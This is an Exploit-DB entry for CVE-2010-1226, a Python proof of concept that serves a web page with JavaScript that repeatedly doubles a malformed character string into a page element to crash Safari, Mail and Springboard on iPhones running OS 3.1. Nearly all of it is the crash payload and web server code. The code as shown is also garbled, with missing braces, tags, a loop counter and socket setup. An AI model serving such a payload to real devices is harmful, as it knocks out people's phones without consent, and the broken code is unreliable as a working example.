iPhone Springboard Malformed Character Crash PoC

EDB-ID: 11769 CVE: 2010-1226 OSVDB-ID: 63521
Verified: Author: Chase Higgins Published: 2010-03-15
Download Exploit: Source Raw Download Vulnerable App: N/A

#iPhone Springboard crash PoC by Chase Higgins. Devices tested: iPhone 2G @ OS 3.1, iPhone 3GS @ 3.1.3
#this script acts as webserver, and causes Safari, as well as Mail and Springboard to crash
#all these apps crash after running this exploit on the iPhone. Unable to debug any of these processes as the gdb on my 
#device is acting up, original iPhone is just too low memory to further test this exploit, so I am releasing it

# Exploit Title: iPhone Springboard Malformed Character Crash PoC
# Date: 3/15/2010
# Author: Chase Higgins
# Software Link: apple.com/iphone/
# Version: iPhone 2G, iPhone 3GS
# Tested on: iPhone OS 3.1, and iPhone OS 3.1.3
# CVE : 
# Code : none

import sys, socket;

def main():
	html = """
	function triggerCrash(){
		evil_div = document.getElementById('evilDiv');
		var evil_string = "\x4e\x5b\x01";
		i = 0;

		while (i < 1000){
			evil_string = evil_string + evil_string;

		evil_div.innerHTML = evil_string;
	<body onLoad="triggerCrash()">
	<div id="evilDiv">

	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM);
	while True:
		channel, details = s.accept();
		print channel.recv(1024);